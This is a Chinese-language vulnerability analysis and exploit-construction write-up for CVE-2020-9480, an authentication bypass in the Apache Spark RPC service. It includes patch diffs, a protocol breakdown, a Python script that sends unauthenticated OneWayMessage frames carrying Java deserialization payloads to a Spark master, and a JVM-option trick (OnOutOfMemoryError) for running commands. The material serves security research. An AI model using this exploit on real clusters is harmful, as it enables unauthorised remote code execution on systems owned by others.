CVE-2020-9480 Apache Spark 认证绕过漏洞EXP构造

 

0x01 漏洞简介

2020 年 06 月 24 日,Apache Spark 官方发布了 Apache Spark 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9480,漏洞等级:高危

Apache Spark是一个开源集群运算框架。在 Apache Spark 2.4.5 以及更早版本中Spark的认证机制存在缺陷,导致共享密钥认证失效。攻击者利用该漏洞,可在未授权的情况下,在主机上执行命令,造成远程代码执行。

 

0x02 SPARK 部署相关背景介绍

SPARK 常用 5 种运行模式,两种运行部署方式.

模式: LOCAL, STANDALONE, YARN, Mesos, Kurnernetes

  1. LOCAL : 本机运行模式,利用单机的多个线程来模拟 SPARK 分布式计算,直接在本地运行
  2. SPARK 集群目前支持 STANDALONE, YARN, MESOS, Kurnernetes 多种调度管理程序。STANDALONE 是 spark 自带的调度程序,下面分析也是以 STANDALONE 调度为主

驱动程序部署方式:CLIENT, CLUSTER

Spark 应用程序在集群上做为独立的进程集运行,由 SparkContext 主程序中的对象(驱动程序 driver program)继续进行调度。

  1. CLIENT 驱动部署方式指驱动程序(driver) 在集群外运行,比如 任务提交机器 上运行
  2. CLUSTER 驱动部署方式指驱动程序(driver) 在集群上运行

驱动程序(driver) 和集群上工作节点 (Executor) 需要进行大量的交互,进行通信

通信交互方式:RPC / RESTAPI

  1. RESTAPI: 方式不支持使用验证(CVE-2018-11770)防御方式是只能在可信的网络下运行,RESTAPI 使用 jackson 做 json 反序列化解析,历史漏洞 (CVE-2017-12612)
  2. RPC: RPC 方式设置可 auth 对访问进行认证,CVE-2020-9480 是对认证方式的绕过。也是分析目标

 

0x03 diff 补丁

漏洞说明,在 standalone 模式下,绕过权限认证,导致 RCE

  1. 配置选项 spark.authenticate 启用 RPC 身份验证,
  2. 配置选项 spark.authenticate.secret 设定密钥

理解:SPARK只要绕过权限认证,提交恶意的任务,即可造成RCE。找到 commit 记录

补丁修正:将 AuthRpcHandlerSaslRpcHandler 父类由 RpcHandler 修正为 AbstractAuthRpcHandlerAbstractAuthRpcHandler 继承自 RpcHandler, 对认证行为进行了约束

通过对比 Rpchandler 关键方法的实现可以发现 2.4.5 版本钟,用于处理认证的 RpcHandler 的 receive重载方法 receive(TransportClient client, ByteBuffer message)receiveStream 方法没有做权限认证。而在更新版本中,父类AbstractAuthRpcHandler 对于 receive重载方法 receive(TransportClient client, ByteBuffer message)receiveStream 添加了认证判断

2.4.5 AuthRpcHandler

  @Override
  public void receive(TransportClient client, ByteBuffer message) {    
    delegate.receive(client, message);    
  }

  @Override    
  public StreamCallbackWithID receiveStream(    
      TransportClient client,    
      ByteBuffer message,    
      RpcResponseCallback callback) {    
    return delegate.receiveStream(client, message, callback);    
  }

2.4.3 AbstractAuthRpcHandler.java 
  public final void receive(TransportClient client, ByteBuffer message) {
    if (isAuthenticated) {
      delegate.receive(client, message);
    } else {
      throw new SecurityException("Unauthenticated call to receive().");
    }
  }

  @Override
  public final StreamCallbackWithID receiveStream(
      TransportClient client,
      ByteBuffer message,
      RpcResponseCallback callback) {
    if (isAuthenticated) {
      return delegate.receiveStream(client, message, callback);
    } else {
      throw new SecurityException("Unauthenticated call to receiveStream().");
    }
  }

回溯代码执行流及SPARK RPC的实现, TransportRequestHandler 调用了 RPC handler receive 函数和 receiveStream,

TransportRequestHandler 介绍:TransportRequestHandler 用于处理 client 的请求,每一个 handler 与一个 netty channel 关联,SPARK RPC 底层是基于 netty RPC 实现的,

*requesthandler 根据业务流类型调用 rpchandler 处理消息

public class TransportRequestHandler extends MessageHandler<RequestMessage> {

  ......

  public TransportRequestHandler(
      Channel channel,
      TransportClient reverseClient,
      RpcHandler rpcHandler,
      Long maxChunksBeingTransferred,
      ChunkFetchRequestHandler chunkFetchRequestHandler) {
    this.channel = channel;   /** The Netty channel that this handler is associated with. */
    this.reverseClient = reverseClient;   /** Client on the same channel allowing us to talk back to the requester. */
    this.rpcHandler = rpcHandler;    /** Handles all RPC messages. */ 
    this.streamManager = rpcHandler.getStreamManager(); /** Returns each chunk part of a stream. */
    this.maxChunksBeingTransferred = maxChunksBeingTransferred; /** The max number of chunks being transferred and not finished yet. */ 
    this.chunkFetchRequestHandler = chunkFetchRequestHandler; /** The dedicated ChannelHandler for ChunkFetchRequest messages. */
  }

  public void handle(RequestMessage request) throws Exception {
      if (request instanceof ChunkFetchRequest) {
        chunkFetchRequestHandler.processFetchRequest(channel, (ChunkFetchRequest) request);
      } else if (request instanceof RpcRequest) {
        processRpcRequest((RpcRequest) request);
      } else if (request instanceof OneWayMessage) {
        processOneWayMessage((OneWayMessage) request);
      } else if (request instanceof StreamRequest) {
        processStreamRequest((StreamRequest) request);
      } else if (request instanceof UploadStream) {
        processStreamUpload((UploadStream) request);
      } else {
        throw new IllegalArgumentException("Unknown request type: " + request);
      }
    }

  ......

  private void processRpcRequest(final RpcRequest req) {
    ......
    rpcHandler.receive(reverseClient, req.body().nioByteBuffer(), new RpcResponseCallback() {......}
    ......
  }

  private void processStreamUpload(final UploadStream req) {
  ......
  StreamCallbackWithID streamHandler = rpcHandler.receiveStream(reverseClient, meta, callback);
  ......
  }

  ......
  private void processOneWayMessage(OneWayMessage req) {
    ......
    rpcHandler.receive(reverseClient, req.body().nioByteBuffer());
    ......
  }

  private void processStreamRequest(final StreamRequest req) {
    ...
    buf = streamManager.openStream(req.streamId);
    streamManager.streamBeingSent(req.streamId);
    ...

  }

}

processRpcRequest 处理 RPCRequest 类型请求(RPC请求),调用 rpchandler.rpchandler(client, req, callback) 方法,需要进行验证

processStreamUpload 处理 UploadStream 类型请求(上传流数据),调用 rpchandler.receiveStream(client, meta, callback) 不需要验证

processOneWayMessage 处理 OneWayMessage 类型请求(单向传输不需要回复),调用 rpchandler.receive(client, req),不需要验证

processStreamRequest 处理 StreamRequest 类型请求,获取 streamId ,取对应流数据。需要 streamId 存在

RPC 消息类型如上

0x01 漏洞点说明

在未作权限约束下,可以使用 RPCREST API 方式,向 SPARK 集群提交恶意任务,反弹shell。

所以,通过创建一个类型为 UploadStreamOneWayMessage 的请求,即可绕过认证逻辑,提交任务,造成RCE。

0x02 背景补充

在Spark 0.x.x与Spark 1.x.x版本中,组件间的消息通信主要借助于Akka。 在SPARK 2.x 及以上版本中,SPARK 网络层是直接依赖于 netty 框架的

TransportContext:SPARK RPC 核心类,传输上下文,包含了用于创建传输服务端(TransportServer)和传输客户端工厂(TransportClientFactory)的上下文信息。

  1. TransportServer 通过构造函数启动 netty,提供底层通信服务
  2. TransportClientFactory 用来创建 TransportClient.

SPARK 启动流程

TransportClientBootstrap,TransportServerBootstrap:是每个客户端连接到服务端时都会在服务端执行的引导程序。

TransportContextcreateClientFactory方法创建传输客户端工厂TransportClientFactory的实例。在构造TransportClientFactory的实例时,还会传递客户端引导程序TransportClientBootstrap的列表

TransportClientFactory内部维护每个Socket地址的连接池

调用TransportContextcreateServer方法创建传输服务端TransportServer的实例

TransportContext 创建 TransportClientFactoryTransportServer的流程

RPC server 端处理请求时,消息格式如下所示

frame size type
8 byte 1 byte

TransportFrameDecoder 读取8byteframe size ,经过messageDecoder读取 1byte 确认消息类型,调用对应类型消息再次进行decode

RPC框架server端处理请求和响应的流程

 

0x04 exp 构造

SPARK RPC 底层基于 NETTY 开发,相关实现封装在spark-network-common.jar(java)和spark-core.jar(scala)中, 在Apache Spark RPC协议中的反序列化漏洞分析 一文中,对 RPC 协议包进行了介绍

0x01 反序列化漏洞

Apache Spark RPC协议中的反序列化漏洞分析 文章是通过构造 RpcRequest 消息,通过 nettyRPChandler 反序列解析处理消息触发反序列化漏洞。

common/network-common/src/main/java/org/apache/spark/network/protocol/message 实现中

协议内部结构由两部分构成header和body,header中的内容包括: 整个frame的长度(8个字节)和 message的类型(1个字节)

其中frame 长度计算:

  • header 长度:8(frame 长度)+ 1(message 类型长度)+ 8 (message 长度)+ 4(body的长度)= 21 字节
  • body 长度
MessageEncoder.java
  public void encode(ChannelHandlerContext ctx, Message in, List<Object> out) throws Exception {
    Message.Type msgType = in.type();
    // All messages have the frame length, message type, and message itself. The frame length
    // may optionally include the length of the body data, depending on what message is being
    // sent.
    int headerLength = 8 + msgType.encodedLength() + in.encodedLength();
    long frameLength = headerLength + (isBodyInFrame ? bodyLength : 0);
    ByteBuf header = ctx.alloc().buffer(headerLength);
    header.writeLong(frameLength);
    msgType.encode(header);
    in.encode(header);
    assert header.writableBytes() == 0;

    if (body != null) {
      // We transfer ownership of the reference on in.body() to MessageWithHeader.
      // This reference will be freed when MessageWithHeader.deallocate() is called.
      out.add(new MessageWithHeader(in.body(), header, body, bodyLength));
    } else {
      out.add(header);
    }
  }

不同信息类型会重载encode 函数 msgType.encode 。

  • 其中 OneWayMessage 包括 4 字节的 body 长度
  • RpcRequest 包括 8 字节的 requestId 和 4 字节的 body 长度
  • UploadStream 包括 8 字节的 requestId ,4 字节 metaBuf.remaining, 1 字节 metaBuf, 8 字节的 bodyByteCount
OneWayMessage.java
  public void encode(ByteBuf buf) {
    // See comment in encodedLength().
    buf.writeInt((int) body().size());
  }

RpcRequest.java
  @Override
  public void encode(ByteBuf buf) {
    buf.writeLong(requestId);
    // See comment in encodedLength().
    buf.writeInt((int) body().size());
  }

UploadStream.java 
public void encode(ByteBuf buf) {
    buf.writeLong(requestId);
    try {
      ByteBuffer metaBuf = meta.nioByteBuffer();
      buf.writeInt(metaBuf.remaining());
      buf.writeBytes(metaBuf);
    } catch (IOException io) {
      throw new RuntimeException(io);
    }
    buf.writeLong(bodyByteCount);

message 枚举类型

Message.java 
public static Type decode(ByteBuf buf) {
      byte id = buf.readByte();
      switch (id) {
        case 0: return ChunkFetchRequest;
        case 1: return ChunkFetchSuccess;
        case 2: return ChunkFetchFailure;
        case 3: return RpcRequest;
        case 4: return RpcResponse;
        case 5: return RpcFailure;
        case 6: return StreamRequest;
        case 7: return StreamResponse;
        case 8: return StreamFailure;
        case 9: return OneWayMessage;
        case 10: return UploadStream;
        case -1: throw new IllegalArgumentException("User type messages cannot be decoded.");
        default: throw new IllegalArgumentException("Unknown message type: " + id);
      }
    }

nettyRpcHandler 处理消息body时,body 由通信双方地址和端口组成,后续是java序列化后的内容(ac ed 00 05)

其中 NettyRpcEnv.scala core/src/main/scala/org/apache/spark/rpc/netty/NettyRpcEnv.scala RequestMessage 类 serialize 方法是 RequestMessage 请求构建部分

private[netty] class RequestMessage(
    val senderAddress: RpcAddress,
    val receiver: NettyRpcEndpointRef,
    val content: Any) {

  /** Manually serialize [[RequestMessage]] to minimize the size. */
  def serialize(nettyEnv: NettyRpcEnv): ByteBuffer = {
    val bos = new ByteBufferOutputStream()
    val out = new DataOutputStream(bos)
    try {
      writeRpcAddress(out, senderAddress)
      writeRpcAddress(out, receiver.address)
      out.writeUTF(receiver.name)
      val s = nettyEnv.serializeStream(out)
      try {
        s.writeObject(content)
      } finally {
        s.close()
      }
    } finally {
      out.close()
    }
    bos.toByteBuffer
  }

  private def writeRpcAddress(out: DataOutputStream, rpcAddress: RpcAddress): Unit = {
    if (rpcAddress == null) {
      out.writeBoolean(false)
    } else {
      out.writeBoolean(true)
      out.writeUTF(rpcAddress.host)
      out.writeInt(rpcAddress.port)
    }
  }

以 OneWayMessage 举例

构造payload

def build_oneway_msg(payload):
    msg_type = b'\x09'
    other_msg = '''
    01 00 0f 31 39 32 2e 31 36 38 2e 31 30 31
2e 31 32 39 00 00 89 6f 01 00 06 75 62 75 6e 74
75 00 00 1b a5 00 06 4d 61 73 74 65 72
    '''
    other_msg = other_msg.replace('\n', "").replace(' ', "")
    body_msg = bytes.fromhex(other_msg) + payload
    msg = struct.pack('>Q',len(body_msg) + 21) + msg_type 
    msg += struct.pack('>I',len(body_msg))
    msg += body_msg
    return msg

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(100)
server_address = ('192.168.101.129', 7077)
sock.connect(server_address)
# get ser_payload  构造java 反序列化payload 
payload = build_oneway_msg(ser_payload)
sock.send(payload)
time.sleep(5)
# data = sock.recv(1024)
sock.close()

使用URLDNS 反序列化payload测试结果如上

0x02 exp 构建

OneWayMessage 可以绕过验证,理论上构造一个提交任务请求就行。尝试通过捕获 rpcrequest 请求并重放。

SPARK deploy 模式为 clusterclientclient 模式下提交任务方即为 driver, 需要和 executor 进行大量交互,尝试使用 --deploy-mode cluster

./bin/spark-submit --class org.apache.spark.examples.SparkPi  --master spark://192.168.101.129:7077   --deploy-mode cluster  --executor-memory 1G --total-executor-cores 2   examples/jars/spark-examples_2.11-2.4.5.jar  10

重放反序列化数据,报错

org.apache.spark.SparkException: Unsupported message OneWayMessage(192.168.101.129:35183,RequestSubmitDriver(DriverDescription (org.apache.spark.deploy.worker.DriverWrapper))) from 192.168.101.129:35183

NettyRpcHandler 处理的反序列化数据为 DeployMessage 类型,DeployMessage消息类型有多个子类。当提交部署模式为cluster时,使用 RequestSubmitDriver 类; 部署方式为 client(默认)时,使用 registerapplication 类。

对不同消息处理逻辑在 master.scala 中,可以看到 receive 方法中不存在RequestSubmitDriver的处理逻辑,OneWayMessage特点就是单向信息不会回复,不会调用 receiveAndreply 方法。

  override def receive: PartialFunction[Any, Unit] = {
    ...
    case RegisterWorker(
    case RegisterApplication(description, driver) 
    case ExecutorStateChanged(
    case DriverStateChanged(
    ...
  }

  override def receiveAndReply(context: RpcCallContext): PartialFunction[Any, Unit] = {
        ...
        case RequestSubmitDriver(description) 
        ...
  }

DEF CON Safe Mode – ayoul3 – Only Takes a Spark Popping a Shell on 1000 Nodes一文中,作者通过传递java 配置选项进行了代码执行。

java 配置参数 -XX:OnOutOfMemoryError=touch /tmp/testspark 在JVM 发生内存错误时,会执行后续的命令
通过使用 -Xmx:1m 限制内存为 1m 促使错误发生

提交任务携带以下配置选项

spark.executor.extraJavaOptions=\"-Xmx:1m -XX:OnOutOfMemoryError=touch /tmp/testspark\"

SPARK-submit 客户端限制只能通过 spark.executor.memory 设定 内存值,报错

Exception in thread "main" java.lang.IllegalArgumentException: Executor memory 1048576 must be at least 471859200. Please increase executor memory using the --executor-memory option or spark.executor.memory in Spark configuration.

最后通过使用 SerializationDumper 转储和重建为 javaOptsscala.collection.mutable.ArraySeq, 并添加 jvm 参数 -Xmx:1m,注意 SerializationDumper 还需要做数组自增,和部分handler 的调整

 

0x05 参考连接

  1. DEF CON Safe Mode – ayoul3 – Only Takes a Spark Popping a Shell on 1000 Nodes
  2. Apache Spark RPC协议中的反序列化漏洞分析
  3. Spark Rpc 消息处理
  4. Spark源码阅读(四):RPC之Transport传输层
  5. Spark 底层网络模块
  6. spark 源码分析之十二—Spark RPC剖析之Spark RPC总结
  7. spark2.1.0之源码分析——RPC服务端引导程序TransportServerBootstrap
  8. spark 官方文档
(完)